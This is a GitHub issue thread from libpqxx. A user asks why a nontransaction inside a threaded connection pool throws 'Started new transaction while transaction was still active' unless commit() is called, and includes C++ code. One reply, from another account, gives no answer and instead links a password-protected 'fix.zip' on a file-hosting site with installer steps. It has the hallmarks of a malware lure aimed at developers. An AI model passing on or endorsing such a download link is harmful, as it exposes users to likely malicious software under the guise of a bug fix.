### ISSUE TITLE
Strange nontransaction behaviour...

### ISSUE THREAD

**Issue by itseramin** [jtv/libpqxx#891]
I was trying to implement my own in memory connection pool logic and based on the [documentation](https://libpqxx.readthedocs.io/stable/group__transactions.html#classpqxx_1_1nontransaction) I shouldn't even use the `commit()` method on this transaction class child...

BUT with this implementation:
```cpp
#pragma once

#include <pqxx/pqxx>

#include "include/db/connection-pool.hpp"

class PGStore
{
public:
    PGStore(ConnectionPool &pool);
    ~PGStore();

    template <typename... T>
    pqxx::internal::result_iteration<T...> query(pqxx::zview query)
    {
        std::shared_ptr<PooledConnection> pooledConnection = _pool->acquire();
        pqxx::nontransaction tx(*pooledConnection->connection);

        pqxx::internal::result_iteration<T...> result = tx.query<T...>(query);

        /** IMPORTANT */
        tx.commit();

        _pool->release(pooledConnection);

        return result;
    }

private:
    ConnectionPool *_pool;
};
```

running a simple query on 5000 threads with 5 active connections in the pool without the `commit` method fails after a few successful ones with the following error:

```sh
terminate called after throwing an instance of 'pqxx::usage_error'
  what():  Started new transaction while transaction was still active.
```

I would assume the `nontransaction` transaction it cleaned up properly for the connection after it is run, but it fails on `pqxx::internal::check_unique_register` method with an `invalid address` (some times it's the old transaction that's still in the pointer) on the `old_guest` pointer...

Do I not understand something correctly here? Is the documentation misleading only for me?

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itseramin** [comment]
Thanks for clearing this up, and making the documentation better 😄 have a nice day 🎉
